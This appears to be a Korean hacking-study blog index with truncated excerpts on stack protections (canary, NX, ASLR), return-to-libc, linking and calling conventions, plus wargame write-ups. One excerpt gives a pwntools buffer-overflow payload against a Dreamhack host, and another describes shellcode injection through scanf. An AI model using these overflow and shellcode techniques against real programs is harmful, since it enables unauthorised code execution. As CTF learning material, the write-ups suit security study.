SAT_HACK

스택의 반환 주소를 덮는 공격은 스택 카나리, NX, ASLR의 도입으로 인해 점점 어려워졌다. 공격 기법은 셸코드 실행에서 라이브러리 실행으로, 그리고 다수의 리턴 가젯을 연결해서 사용하는 Return Oriented Progamming(ROP)로 발전하였습니다. 사실 바이너리의 PLT에 system 함수를 많은 개발자가 공격 벡터로 사용할 수 있음을 알고 있으며, 여러 개발 도구들에서도 해당 함수의 사용을 지양하도록 경고하고 있습니다. 그래서 실제 바이너리에서 system 함수가 PLT에 포함될 가능성은 매우 적습니다. 현실적으로, ASLR이 걸린 환경에서 system 함수를 사용하려면 프로세스에서 libc가 매핑된 주소를 찾고, 그 주소로부터 system 함수의 오프셋을 이용하여 함수의 주소를 계산..

NX로 공격자가 직접 쉘 코드를 실행하는 것은 어려워졌지만, 스택 버퍼 오버플로우 취약점으로 반환주소를 덮는건 가능했다. // Name: rtl.c // Compile: gcc -o rtl rtl.c -fno-PIE -no-pie #include #include const char* binsh = "/bin/sh"; int main() { char buf[0x30]; setvbuf(stdin, 0, _IONBF, 0); setvbuf(stdout, 0, _IONBF, 0); // Add system function to plt's entry system("echo 'system@plt"); // Leak canary printf("[1] Leak Canary\n"); printf("Buf: "); rea..

Address Space Layout Ramdomization(ASLR) 공격자가 메모리에서 임의 버퍼의 주소를 알기 어렵게 한다. ASLR은 바이너리가 실행될 때마다 스택, 힙, 공유 라이브러리등을 임의의 주소에 할당하는 보호 기법입니다. ASLR은 커널에서 지원하는 보호기법이며, 다음의 명령어로 확인 가능 cat /proc/sys/kernel/randomize_va-space 리눅스에서 이 값은 0, 1, 2의 값을 가질 수 있다. No ASLR(0) : ASLR을 적용하지 않는다. Conservative Randomization(1) : 스택, 힙, 라이브러리 , vdso 등 Conservative Randomization(2) + brk(2) : (1)의 영역과 brk로 할달한 영역 ASLR 예제..

라이브러리 - 라이브러리는 컴퓨터 시스템에서, 프로그램들이 함수나, 변수를 공유해서 사용할 수 있게함 - 다수의 프로그램들은 서로 공통으로 사용하는 함수들이 많다. C언어를 비롯하여 많은 컴파일 언어들은 자주 사용되는 함수들의 정의를 묶어서 하나의 라이브러리 파일로 만들고 여러 프로그램 파일이 공유해서 사용할 수 있도록 재원. 링크 링크는 많은 프로그래밍 언어에서 컴파일 마지막 단계, 프로그램에서 어떤 라이브러리 함수를 사용한다면, 호출된 함수와 실제 함수의 링크 과정에서 연결된다. 리눅스에서 C 소스 코드는 전처리, 컴파일, 어셈블 과정을 거쳐서 ELF형식을 갖춘 오브젝트 파일로 번역된다. 오브젝트 파일은 실행 가능한 형식은 갖추고 있지만 라이브러리 함수들의 정의가 어디 있는지 알지 못하므로 실행은 불..

gets는 BOF 취약점이 있는 함수! 지렁이 같지만 열심히 플래그를 탈취하기 위한 방법을 그려봤다. read_flag의 주소만 알아낸다면 쉽게 풀 수 있다. from pwn import * p = remote("host3.dreamhack.games", 15977) payload = b"A"*128 payload += p32(0xFFFFFFFF) payload += p32(0x080485b9) p.sendline(payload) p.interactive() 휴

먼저 C 코드를 보자 1, scanf 범위가 너무 커서 BOF가 가능 2. print 함수로 buf의 주소가 출력된다?? 이거다!! buf함수로 바로 점프해서 쉘코드를 실행시킨다. 쉘코드 작성시 주의 scanf 함수의 경우 \x09, \x0a, \x0b, \x0c, \x0d, \x20 를 읽지 못함(전 까지만 입력 받는다.) 블로그 주인장은 shellcode.asm을 이렇게 작성했고 0b가 들어있네 Ah...(대충 매우 심한 욕) mov $0xb, %al 에서 문제가 생겼으니 수정한다. 이번에는 0a가 들어갔네 ㅋ 다시한다. 감격,,,드디어 성공 이제 프로그램 익스플로잇 흐름을 잡으면 main() 함수가 ret을 호출할 때 eip가 buf 위치로 이동하면서 쉘 코드를 실행할 것이다. from pwn im..

1번 문제 입니다ㅏㅏㅏ 처음에 엄청 헤멨던 기억이... 문제 이름에서 추측이 가능하듯이 리턴 주소에 get_shell의 주소를 덮어주면 되는 문제이다. c코드에서 추측해보길 scanf에 BOF 가능성이 있으므로 buf에 return address 전까지 더미 문자열을 넣는다. 하지만 문자열의 길이는 얼만큼 넣어야 할까? buf의 사이즈인 0x28 만큼?? 이건 gdb를 돌려서 확인해본다. 에 rsp를 0x30만큼 빼는걸 확인하면 스택이 0x30만큼 빠지니까 0x30 + rbp 만큼 dummy 문자열을 만든다. 그다음 바로 get_shell 함수 주소를 return 주소에 넣어서 쉘을 획득한다. get_shell 함수의 주소는 disas or print 둘 중에 더 편한걸로 알아내면 된다. 이제 explo..

https://github.com/z3tta/Exploit-Exercises-Protostar/blob/master/07-Stack7.md GitHub - z3tta/Exploit-Exercises-Protostar: Solutions for Exploit-Exercises Protostar Solutions for Exploit-Exercises Protostar. Contribute to z3tta/Exploit-Exercises-Protostar development by creating an account on GitHub. github.com return address로 바로 점프한다.

함수의 호출 규약은 함수의 호출 및 반환에 대한 약속이다. 한 함수에서 다른 함수를 호출할 때, 프로그램의 실행 흐름은 다른 함수로 이동한다. 그리고 호출한 함수가 반환하면, 다시 원래의 함수로 돌아와서 기존의 흐름을 이어나갑니다. 여기서 질문! 어떻게 다시 원래의 함수로 돌아올까요?? 오늘은 이거에 대한 해답을 정리해볼까 합니다. 함수를 호출할 때는 반환된 이후를 위해 호출자(Caller)의 상태(Stack frame) 및 반환 주소(Return Address)를 저장해야 합니다. 또한 호출자는 피호출자(Callee)가 요구하는 인자를 전달해 줘야하며 실행이 종료될 때는 반환 값을 전달 받아야 합니다. 함수의 호출 규약을 적용하는 것은 일반적으로 컴파일러의 몫입니다. 프로그래머가 고수준 언어로 코드를 ..

컴퓨터는 3개의 층으로 나뉘어 있다. 어플리케이션(운영체제 영역 혹은 유져 영역), Kernel, 하드웨어 기본적으로 osi 7계층에서는 왼쪽 그림처럼 물리 영역인 L1 ~ L7까지 나눈다. 하지만 DOD(미국 방위성? 아마 맞을꺼다)에서는 4가지로 나누는데 맨 위는 어플리케이션, 트랜스포트, 네트워크, 엑세스 영역(접근단) 이렇게 나눈다. DOD 개념으로 네트워크를 생각하면 조금 더 네트워크에 대해 이해하기 쉬운데 예를 들어보겠습니다. User 영역에서 어떤 프로세스가 동작하고 있다고 가정해 보겠습니다. (예를들어 롤이라면, 필자는 만년 실버이다) 만약 윈도우라면 커널 수준에서 어떤 프로토콜이 구현되어 있는데 전송이다라고 하면 TCP/IP로 구현을 한거죠. 맨 아래 하드웨어 영역에는 NIC(네트워크 인..